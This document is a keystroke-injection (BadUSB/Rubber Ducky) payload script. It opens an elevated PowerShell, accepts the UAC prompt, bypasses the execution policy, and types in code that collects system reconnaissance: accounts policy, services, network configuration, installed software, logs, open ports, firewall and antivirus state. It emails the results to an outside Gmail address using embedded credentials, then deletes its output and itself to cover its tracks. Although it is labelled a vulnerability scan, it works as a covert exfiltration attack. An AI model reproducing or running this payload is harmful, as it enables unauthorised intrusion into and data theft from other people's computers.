REM script in progress DELAY 1000 REM Open Start Menu CONTROL ESCAPE DELAY 3000 STRING powershell REM Navigate to the context menu to run PowerShell as an administrator DELAY 2000 RIGHTARROW DELAY 500 DOWNARROW DELAY 500 ENTER DELAY 5000 ALT Y DELAY 5000 REM Set PowerShell Execution Policy to Bypass DELAY 1000 STRING set-executionpolicy bypass -scope process -force DELAY 100 ENTER DELAY 400 REM Create the PowerShell script in memory and execute it DELAY 100 STRING $securepassword = convertto-securestring 'YourAppSpecificPassword' -asplaintext -force DELAY 100 ENTER DELAY 400 STRING $credential = new-object system.management.automation.pscredential ('igrowsc@gmail.com', $securepassword) DELAY 100 ENTER DELAY 400 STRING $script = { DELAY 100 ENTER DELAY 400 STRING function check-passwordpolicy { DELAY 100 ENTER DELAY 400 STRING net accounts DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function audit-services { DELAY 100 ENTER DELAY 400 STRING get-service | select-object name, displayname, status, starttype DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function check-networksettings { DELAY 100 ENTER DELAY 400 STRING get-netipconfiguration DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function check-softwarevulnerabilities { DELAY 100 ENTER DELAY 400 STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function check-cve { DELAY 100 ENTER DELAY 400 STRING param ( DELAY 100 ENTER DELAY 400 STRING [string]$productname, DELAY 100 ENTER DELAY 400 STRING [string]$version DELAY 100 ENTER DELAY 400 STRING ) DELAY 100 ENTER DELAY 400 STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version" DELAY 100 ENTER DELAY 400 STRING start-sleep -seconds 5 DELAY 100 ENTER DELAY 400 STRING $response = invoke-restmethod -uri $uri -method get DELAY 100 ENTER DELAY 400 STRING if ($response.totalresults -gt 0) { DELAY 100 ENTER DELAY 400 STRING foreach ($cve in $response.result.cve_items) { DELAY 100 ENTER DELAY 400 STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)" DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING } else { DELAY 100 ENTER DELAY 400 STRING "no cves found for $productname $version" DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function analyze-logs { DELAY 100 ENTER DELAY 400 STRING get-eventlog -logname system -newest 100 DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function check-openports { DELAY 100 ENTER DELAY 400 STRING netstat -an DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function check-missingupdates { DELAY 100 ENTER DELAY 400 STRING get-windowsupdatelog DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function check-firewallstatus { DELAY 100 ENTER DELAY 400 STRING netsh advfirewall show allprofiles DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function check-smbv1status { DELAY 100 ENTER DELAY 400 STRING get-windowsoptionalfeature -online -featurename smb1protocol DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function check-antivirusstatus { DELAY 100 ENTER DELAY 400 STRING get-mpcomputerstatus DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING function send-emailandcleanup { DELAY 100 ENTER DELAY 400 STRING param ( DELAY 100 ENTER DELAY 400 STRING [string]$smtpserver, DELAY 100 ENTER DELAY 400 STRING [string]$smtpfrom, DELAY 100 ENTER DELAY 400 STRING [string]$smtpto, DELAY 100 ENTER DELAY 400 STRING [string]$messagesubject, DELAY 100 ENTER DELAY 400 STRING [string]$messagebody, DELAY 100 ENTER DELAY 400 STRING [string]$attachmentpath, DELAY 100 ENTER DELAY 400 STRING [system.management.automation.pscredential]$credential DELAY 100 ENTER DELAY 400 STRING ) DELAY 100 ENTER DELAY 400 STRING $smtp = new-object net.mail.smtpclient($smtpserver) DELAY 100 ENTER DELAY 400 STRING $smtp.credentials = $credential DELAY 100 ENTER DELAY 400 STRING $smtp.enablessl = $true DELAY 100 ENTER DELAY 400 STRING $smtp.send($smtpfrom, $smtpto, $messagesubject, $messagebody + (get-content -path $attachmentpath -raw)) DELAY 100 ENTER DELAY 400 STRING remove-item -path $attachmentpath DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING check-passwordpolicy > results.txt DELAY 100 ENTER DELAY 400 STRING audit-services >> results.txt DELAY 100 ENTER DELAY 400 STRING check-networksettings >> results.txt DELAY 100 ENTER DELAY 400 STRING check-softwarevulnerabilities >> results.txt DELAY 100 ENTER DELAY 400 STRING analyze-logs >> results.txt DELAY 100 ENTER DELAY 400 STRING check-openports >> results.txt DELAY 100 ENTER DELAY 400 STRING check-missingupdates >> results.txt DELAY 100 ENTER DELAY 400 STRING check-firewallstatus >> results.txt DELAY 100 ENTER DELAY 400 STRING check-smbv1status >> results.txt DELAY 100 ENTER DELAY 400 STRING check-antivirusstatus >> results.txt DELAY 100 ENTER DELAY 400 STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | foreach-object { check-cve -productname $_.displayname -version $_.displayversion } >> results.txt DELAY 100 ENTER DELAY 400 STRING send-emailandcleanup -smtpserver "smtp.gmail.com" -smtpfrom "igrowsc@gmail.com" -smtpto "igrowsc@gmail.com" -messagesubject "vulnerability scan results" -messagebody "attached are the results of the vulnerability scan." -attachmentpath "results.txt" -credential $credential DELAY 100 ENTER DELAY 400 STRING remove-item -path $myinvocation.mycommand.path DELAY 100 ENTER DELAY 400 STRING } DELAY 100 ENTER DELAY 400 STRING invoke-command -scriptblock $script DELAY 100 ENTER DELAY 20000